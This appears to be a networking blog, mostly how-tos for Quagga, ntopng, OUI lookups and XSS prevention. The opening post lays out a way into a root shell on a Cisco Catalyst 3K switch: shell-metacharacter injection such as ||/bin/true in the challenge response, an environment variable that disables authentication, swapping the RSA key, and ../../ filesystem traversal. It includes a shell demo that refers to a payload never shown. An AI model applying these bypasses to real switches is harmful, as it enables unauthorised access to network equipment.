Netcat found ...
[code]
bash-3.2# find / -name nc
/tmp/sw/mount/cat3k_caa-infra.SPA.03.03.03SE.pkg/usr/binos/bin/nc
/usr/binos/bin/nc
[/code]
What can be done with it? You can create whatever reality you want...
[code]
[EXTRA] Building a toolchain for:
[EXTRA] build = x86_64-unknown-linux-gnu
[EXTRA] host = x86_64-unknown-linux-gnu
[EXTRA] target = mips-unknown-elf
bash-3.2# file /mnt/usb0/ninvaders
/mnt/usb0/ninvaders: ELF 32-bit MSB executable, MIPS, MIPS-I version 1 (SYSV),
dynamically linked (uses shared libs), for GNU/Linux 2.6.18, with unknown capability
0x41000000 = 0xf676e75, stripped
[/code]
When you request the shell, the following happens:
a) shell_wrapper calls system('code_sign_verify_nova_pkg SecureShell challenge response')
(the same binary is used to verify the images)
b) code_sign_verify_nova_pkg reads 2k from /dev/mtdblock6 via libcodesign_pd.so + libflash.so, signs the challenge, compares it to the response, and returns 0 if it is valid
c) since the response is interpolated into that shell command line, anything like ||/bin/true will work just fine
shell_wrapper ignores verification entirely if DISABLE_SHELL_AUTHENTICATION=1 is set in the environment
the RSA public key on mtdblock6 can be changed, so you can generate a valid response if you hold its secret companion key
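The injection in step c) can be sketched in plain POSIX shell. The names below are stand-ins, not the real Cisco binaries; the point is only that when a wrapper interpolates a raw "response" string into a command line passed to system(), shell metacharacters in that string are honored before the verifier ever gets to reject it:

```shell
#!/bin/sh
# fake_verifier stands in for code_sign_verify_nova_pkg: it always fails,
# just as the real verifier would for any wrong response.
fake_verifier() { return 1; }

response='|| echo BYPASSED'            # attacker-supplied "response"
# the wrapper effectively does: system("verifier challenge <response>")
result=$(eval "fake_verifier challenge $response" && echo "shell granted")
echo "$result"
```

Because `||` is interpreted by the shell, the failing verifier is simply short-circuited, which is exactly why the `bash 1>&2` and `||/bin/true` payloads above work.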
[code]
you can escape the IOS filesystem jail (/mnt/sd3/user) with ../../ , so "copy foo ../../etc" would copy foo to /etc
[/code]
Wednesday, October 17, 2018
Cisco MACs (OUI) addresses - all of them
00:00:0C Cisco # CISCO SYSTEMS, INC.
00:01:42 Cisco # CISCO SYSTEMS, INC.
00:01:43 Cisco # CISCO SYSTEMS, INC.
00:01:63 Cisco # CISCO SYSTEMS, INC.
00:01:64 Cisco # CISCO SYSTEMS, INC.
00:01:96 Cisco # CISCO SYSTEMS, INC.
00:01:97 Cisco # CISCO SYSTEMS, INC.
00:01:C7 Cisco # CISCO SYSTEMS, INC.
00:01:C9 Cisco # CISCO SYSTEMS, INC.
00:02:16 Cisco # CISCO SYSTEMS, INC.
00:02:17 Cisco # CISCO SYSTEMS, INC.
00:02:3D Cisco # Cisco Systems, Inc.
00:02:4A Cisco # CISCO SYSTEMS, INC.
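Given a table in the format above, a few lines of shell are enough to resolve a MAC address to its vendor. This is a sketch under assumptions: the file name /tmp/oui.txt and its sample entries are invented for the demo, and the format is one "XX:XX:XX Vendor ..." entry per line:

```shell
#!/bin/sh
# Build a tiny sample OUI table (hypothetical path and contents).
cat > /tmp/oui.txt <<'EOF'
00:00:0C Cisco # CISCO SYSTEMS, INC.
00:01:42 Cisco # CISCO SYSTEMS, INC.
EOF

mac="00:01:42:ab:cd:ef"
# First three octets = the OUI; normalize to upper case for the lookup.
prefix=$(printf '%s' "$mac" | cut -d: -f1-3 | tr '[:lower:]' '[:upper:]')
grep -i "^$prefix" /tmp/oui.txt     # prints the matching vendor line
```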
Monitor keypresses in Linux CLI (embedded)
Cmd: showkey -a
Press any keys - Ctrl-D will terminate this program
a 97 0141 0x61
b 98 0142 0x62
c 99 0143 0x63
d 100 0144 0x64
e 101 0145 0x65
f 102 0146 0x66
g 103 0147 0x67
Sunday, September 30, 2018
Steps to prevent cross-site scripting (XSS) attacks
How-To: Prevent the XSS attack vector from being leveraged
Additional steps from development to deployment
**Developers**
- should determine what safe user input is and reject everything else, be it text, JavaScript, or any unauthorized piece of code
- depending on the input text box, can restrict text to certain characters (avoiding ones that cause trouble) and limit the maximum number of characters
- should write code that ensures improperly formatted data is never inserted directly into the HTML content, which might compromise the whole web application
- should implement prepared statements (known to be reliable) for any database queries, as well as the input validation described above
**Website operators**
- should carefully choose third-party web app providers to ensure their products have the right security measures in place
- should test the web apps to ensure they are not vulnerable to attacks involving cross-site scripting or SQL injection
- should continuously scan their sites in real time to detect any unauthorized code, using not only automated website vulnerability scanners (e.g., Nikto, OWASP tools)
- have to be proactive ==> hire experienced professionals (white- or grey-hat) who can assess web app security against attacks like these with a custom approach
========================================================================
The last step is important!
Anything less than a proactive, comprehensive approach to securing your sites will lead to infringing on a great number of consumers' data privacy - and to consequences under regulations like GDPR.
As a good example of the do's and don'ts, we might mention the recent attack on British Airways. But you can pick practically any of the large attacks from the past five years.
========================================================================
::Remember::
Just because a website is secure doesn't necessarily mean its web applications are secure as well.
source: TechRepublic
( https://www.techrepublic.com/article/british-airways-data-theft-demonstrates-need-for-cross-site-scripting-restrictions )
Sunday, August 12, 2018
Quagga == Cisco-like CLI in Linux
Quagga Router
( https://www.quagga.net/ )
- Cisco-like interface and commands - that is the Quagga Routing Software Suite
- all the commonly used routing protocols: BGP, OSPF, RIP, RIPng, and also IS-IS
- routing is done by the OS / Linux kernel -- no virtualization or simulation,
  which is the essence of its speed and lightness
Complete manual in PDF (download from the U.S. Navy .mil website):
https://downloads.pf.itd.nrl.navy.mil/ospf-manet/archive/quagga-0.99.17mr2.0/quagga.pdf
Install Quagga on Debian, Ubuntu, Gentoo, Centos etc.
-- use the package manager, or download the latest release and build it yourself
Ubuntu direct install:
sudo apt install quagga*
Download latest - quagga-1.2.4.tar.gz:
wget -P /temp http://download.savannah.gnu.org/releases/quagga/quagga-1.2.4.tar.gz
Compile & install:
tar -xzvf /temp/quagga-1.2.4.tar.gz -C /temp
cd /temp/quagga-1.2.4
./configure
make
sudo make install
now enable the routing daemons you want to use:
sudo nano /etc/quagga/daemons
Change as needed:
zebra=yes #<<<<<< has to be enabled for basic functionality
bgpd=yes
ospfd=yes
ospf6d=no
ripd=yes
ripngd=yes
isisd=no
babeld=no
Now you can copy the config samples to main dir:
cp /usr/share/doc/quagga/examples/*.* /etc/quagga/
Also edit the configuration file for VTYSH CLI to enable:
cd /etc/quagga
mv vtysh.conf.sample vtysh.conf
The last thing we need is to enable IP forwarding:
# echo "1" > /proc/sys/net/ipv4/ip_forward
This writes the value "1" into the /proc/sys/net/ipv4/ip_forward file and activates IP forwarding.
To keep IP forwarding on after Linux reboots, edit the /etc/sysctl.conf file:
sudo nano /etc/sysctl.conf
press Ctrl+W, type "forward", press Enter, and change the value to 1:
net.ipv4.ip_forward = 1
Or you can also use:
sudo su
echo "net.ipv4.ip_forward = 1" >> /etc/sysctl.conf
So, are you ready?
Check the config files and run a vtysh instance:
## vtysh -C
## vtysh
router> enable
router#
router# configure terminal
router(config)#
router(config)#end
router#write
You can start to use the Linux for routing!
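As a first exercise, a minimal single-area OSPF configuration entered through vtysh might look like this (a sketch only: the router-id and network are invented, and it assumes ospfd=yes was set in /etc/quagga/daemons above):

```
router# configure terminal
router(config)# router ospf
router(config-router)# ospf router-id 10.0.0.1
router(config-router)# network 10.0.0.0/24 area 0
router(config-router)# end
router# write
```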
In the next article:
how to create a BGP session between your home Cisco router (in GNS3) and your cloud VPS
Enjoy!
Thursday, August 11, 2016
NetFlow + NtopNG
-- after a few hours of pulling my hair out, I finally have a NetFlow collector up and running
-- finally went for Ntop with the NBOX web GUI, and I must admit the graphics are just COOL! :)
-- the dashboard and everything around it is built with precision and experience
-- it can be installed from the repositories ;)
sudo dpkg -i apt-ntop-stable.deb
sudo apt-get clean all
sudo apt update
sudo apt install pfring \
  nprobe ntopng ntopng-data n2disk cento nbox pfring-drivers-zc-dkms
sudo apt install pfring \
  nprobe ntopng ntopng-data n2disk cento nbox pfring-drivers-zc-dkms
sudo apt update
sudo apt install ntopng
(yes, the pfring install is really there twice -- the first run didn't resolve all the dependencies)
To activate the new configuration, you need to run:
service apache2 reload
insserv: warning: script 'K01nfsen' missing LSB tags and overrides
insserv: warning: script 'nfsen' missing LSB tags and overrides
[ ok ] Reloading apache2 configuration (via systemctl): apache2.service.
[ ok ] Restarting apache2 (via systemctl): apache2.service.
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
You can now point your browser to https://localhost/
The default user is nbox with password nbox
*** IMPORTANT IMPORTANT IMPORTANT IMPORTANT IMPORTANT ***
So you can go ahead and check it - don't forget to change default password and restart apache2 after ... :D
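One piece not shown above: the collector only displays what the routers export to it. A hedged Cisco IOS exporter sketch (the collector address, UDP port, and interface name are invented; point it at the host running nProbe/ntopng):

```
! Hypothetical: export NetFlow v9 for traffic entering Gi0/0
! to the collector at 192.0.2.10, UDP port 2055
ip flow-export destination 192.0.2.10 2055
ip flow-export version 9
interface GigabitEthernet0/0
 ip flow ingress
```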